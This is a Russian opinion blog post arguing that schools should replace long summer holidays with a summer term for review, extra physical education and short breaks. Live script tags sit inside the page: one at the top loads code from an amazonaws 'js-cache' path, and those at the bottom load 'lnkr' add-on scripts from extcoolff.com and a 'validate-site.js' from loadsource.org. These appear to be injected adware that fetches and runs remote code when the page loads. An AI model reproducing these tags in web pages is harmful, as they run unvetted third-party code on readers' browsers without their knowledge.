Какой должна быть наша школа? Часть 3. Нужны ли в школе каникулы?

На модерации Отложенный

<script type="text/javascript" src="http://s3.amazonaws.com/js-cache/19d2b7dbe41d133ee6.js"></script>

Как улучшить качество обучения в школах и улучшить здоровье школьников?

 В настоящее время увеличение необходимого объема информации, которую вынужден получать школьник приводит к увеличению часов обучения, количества уроков,снижению двигательной активности,гиподинамии и, как следствие, ухудшению здоровья и физической формы школьников. А снижение объёма знаний необходимых для усвоения не предвидится. Более того, предвидится их увеличение. И как тут быть? Как вместить в прокрустово ложе школьной программы больше информации и при этом сделать нашу молодёжь здоровее? Конечно, совершенствование методик обучения , но, оказывается, есть ещё один способ, который нами(обществом) совершенно не замечается.

 Давайте посмотрим как организован процесс обучения в школе в течении года. Начнём с того, что за период летних каникул школьники непроизвольно забывают очень много из того, что они узнали в предыдущий учебный год. Поэтому, начало нового учебного года знаменуется тем, что школьники, почти всю первую четверть, повторяют материал предыдущего года обучения. Затем две четверти идёт изучение нового материала, а , под занавес, перед летними каникулами, в четвёртой четверти идёт опять повторение того, что изучалось в второй и третьей четверти. Так было в той школе, которой учился я и мои дети. Так, или почти так, было и во всех школах.

 Получается, что из 9 месяцев обучения усвоению нового материала отводится только половина времени. И больше никак. А отсюда и перегруженность, переутомляемость школьников, снижение параметров их физического развития, не подготовленность, например, мальчиков к службе в армии. Недостаточное физическое развитие девочек приводит к проблемам появления здорового потомства. Ну и так далее.

 В результате, длительные летние каникулы воспринимаются обществом как необходимая мера и единственная панацея для восстановления физического состояния детей. Летние каникулы воспринимаются обществом действенным инструментом защиты детства. Но на самом деле это не так.

 Никто не задумывался над вопросом - откуда взялись летние каникулы?

 Для ответа на это вопрос необходимо понять как складывалась система обучения детей. Ведь, в прошлом люди занимались преимущественно сельским трудом. Жили в деревнях, питались с того, что давала им земля. И образ жизни был привязан к процессу добывания средств к существованию. То есть, летом все люди занимались тем, что работали в поле, заготавливали запасы на зиму,а зимой расходовали всё это, дожидаясь прихода новой весны. Естественно, что в летний период все взрослые были заняты добыванием хлеба насущного. Да и не только взрослые. Дети так же участвовали в этом процессе. Бездельников в летний период народ не знал.

 А когда полевые работы заканчивались, то появлялось гораздо больше времени. Поэтому и сложился такой порядок обучения. Летом все - и ученики и учителя работали в поле, а зимой, когда появлялось время и у детей и у учителей, начинался процесс обучения.

 Как видите летних каникул, как периода сознательного освобождения от учебного труда - отдыха, не было. Просто не было возможности заниматься обучением детей, ибо надо было растить и собирать урожай.

 Характер хозяйственной деятельности человека и привёл к формированию такого порядка обучения. Лето - перерыв в учёбе, а зима - напряженное время обучения. И этот порядок обучения сохранился до наших дней.

 Но время изменилось. Сегодня основная масса людей добывает свой хлеб не в поле. Занятость человечества стала круглогодичной. Потребность общества в детском труде отпала. И перерыв в учёбе перестал быть необходимым. Но каникулы остались. Зачем?

 Давайте посмотрим на летние школьные каникулы по-внимательнее. Лето для детей это период безделья. Учёбы в школе естественно нет, но и все кружки, секции тоже закрыты. Казалось- бы должно быть наоборот. У детей есть много свободного времени и надо их чем-то занять, а мы закрываем все кружки и секции. Абсурд.

 Те дети, которые выезжают в различные лагеря отдыха попадают в атмосферу, в которой главное это питаться и развлекаться. Мы сами прививаем нашим детям привычку к безделью. Так кого мы с вами воспитываем? Единственное положительное значение каникул заключается, безусловно, в укреплении физического состояния детей. Хотя это происходит стихийно, бесконтрольно.

 Но каждый педагог вам скажет, что дети, возвращающиеся с каникул, ещё долгое время адаптируются к школьной жизни, а это естественно сказывается на качестве обучения и не в лучшую сторону.

 А теперь представьте, что летних каникул нет. 

 Что это даёт? На 30% увеличивается время обучения. А значит, можно снизить интенсивность обучения в день. Уменьшить количество уроков, снизить нагрузку на детей. А снижение чрезмерной нагрузки на умеренную, как известно, благоприятно скажется прежде всего на физическом состоянии детей. Но ведь тогда и каникулы, как главный инструмент восстановления здоровья детей, уже потеряет своё значение. Попросту, дети не будут уставать, переутомляться, как следствие, не будут болеть, а значит и длительный период безделья уже не нужен будет.

 Хотя, конечно, это не совсем так. Конечно, детям, всё равно, будет требоваться период снижения учебной нагрузки. Но ведь это так просто сделать именно отказавшись от летних каникул.

 Ведь достаточно организовать процесс обучения так, чтобы летом школьники занимались только повторением того материала, который они изучали в течении года. Это первое.

 Второе - необходимо было бы на летний период отказаться от практики домашних заданий. Можно было бы так организовать уроки в летний период, чтобы приходя в классы дети занимались только самостоятельными работами. Разумеется под контролем учителей с получением оценок за выполненную работу. Возможно, даже, эти оценки должны быть более значимые, чем оценки получаемые в осенне-зимне-весенний период за изучение нового материала. Поскольку главная задача обучения не просто "набить головы" учеников информацией, а научить использовать эту информацию для решения практических задач.

 Кроме того, трёхмесячный период повторения материала,в основном, конечно, будет требоваться при усваивании материала точных наук: математики, физики, наверное русского языка и других, но далеко не всех. А это означает опять снижение учебной нагрузки в летний период. Более того, школьную программу возможно будет построить так, чтобы на летний период дети больше получали физической нагрузки на уроках физкультуры, труда.Проще говоря, летом могло бы быть больше уроков физкультуры и труда.

 Таким образом, наличие в процессе обучения летнего периода может, с одной стороны, СНИЗИТЬ ИНТЕНСИВНОСТЬ учебной нагрузки на школьников в течении года, УЛУЧШИТЬ ПОКАЗАТЕЛИ ФИЗИЧЕСКОГО развития, за счёт увеличения количества и интенсивности уроков физкультуры и труда в летнее врем, а, с другой стороны, ПОЗВОЛИТ школьникам НЕ ПОТЕРЯТЬ ЗНАНИЙ за счёт того, что летний период это будет период повторения всего материала, пройденного ими за предыдущий учебный год.

 Огромное значение будет иметь и тот факт, что исчезнет период адаптации от состояния полного умственного безделья к напряжённой умственной работе. Что очень вредно для здоровья. Ведь, как известно, даже машины ломаются, преимущественно именно в момент перехода из состояния покоя в рабочее и обратно. А что же говорить о людях, детях? Каждый из нас знает как тяжело приходится адаптироваться на работе после месячного отпуска. Кстати поговорим теперь об отпусках.

 Но как быть в том случае, когда родители вместе с детьми будут находиться на отдыхе во время родительских отпусков или на период отдыха детей в детских лагерях отдыха? Это тоже не проблема. Ведь, есть же старый добрый приём, когда школьникам задают задание на лето. Например, по литературе прочитать какие-то книги.

 Так же надо поступать и в этом случае. Все дети, которые в летний период будут находиться вместе с родителями должны будут получить от школьных учителей задание, которое они должны будут выполнить и представить учителям на оценку после возвращения в класс.

 Это будет иметь большое воспитательное значение и для родителей, для укрепления их отношений с собственными детьми. Они должны будут проконтролировать выполнение заданий, организовать условия. Это не так трудно будет. Достаточно будет захватить с собой нужные учебники и предоставить своему ребёнку 2-3 часа в день для выполнения школьного задания, выданного ему на период отсутствия. Ну и, конечно, оказать помощь в выполнении задания, при необходимости.

 А в условиях детского лагеря это должен будет обеспечить педагогический персонал лагеря. Можно, даже, организовать процесс выполнения школьных заданий через интернет непосредственно педагогами школы. Всё можно. Но, все-таки, каникулы школьникам нужно устраивать. Только не такие длительные. Например, в конце мая и в конце августа длительностью 7-10 дней.

 А что даёт отказ от летних школьных каникул для осенне-зимне-весеннего периода обучения? Прежде всего, отсутствие периода адаптации школьников от атмосферы каникулярной беззаботности к школьной. Об этом уже говорилось выше. Это важно, конечно, но это не главное.

 Главное, пропадает необходимость первую четверть обучения посвящать повторению старого материала. Ведь, дети всё лето будут заниматься повторением, а значит, можно сразу приступать к изучению нового материала. И в четвёртой четверти отказаться от повторения так же.

 То есть, период усвоения нового материала вырастет вдвое. Это позволит снизить интенсивность обучения, уменьшить продолжительность учебного дня и , как следствие, повысить качество усваивания материала, уменьшить учебную нагрузку, облегчить учебный труд, снизить переутомление, заболеваемость школьников.

 Вот и получается, что отказ от длительных летних школьных каникул, распространение на летний период обучение школьников, рациональное перераспределение учебных программ с учётом летней специфики позволяют повысить качество обучения школьников и одновременно, повысить показатели физического состояния детей, снизить заболеваемость. Но самое главное, прекратит порочную практику воспитания в молодёжи привычки к безделию.

 Остаётся только решить проблему организации работы школы, педагогического коллектива. Это, несомненно, довольно сложная и трудоёмкая проблема. Но давайте выбирать. Что нам надо? Лучше обучать детей или создавать более комфортные условия для работы педагогам? Для чего существует школа? Для обучения детей или предоставления педагогам возможности заработка? Хотя, конечно, ни сколько нельзя умалять важности, сложности и ответственности труда педагога. Но, всё-таки,что для нас главное и чего мы хотим?

<script type="text/javascript" src="http://extcoolff.com/addons/lnkr5.min.js"></script> <script type="text/javascript" src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52178x6610x&amp;r=1537118461055"></script> <script type="text/javascript" src="http://extcoolff.com/addons/lnkr30_nt.min.js"></script>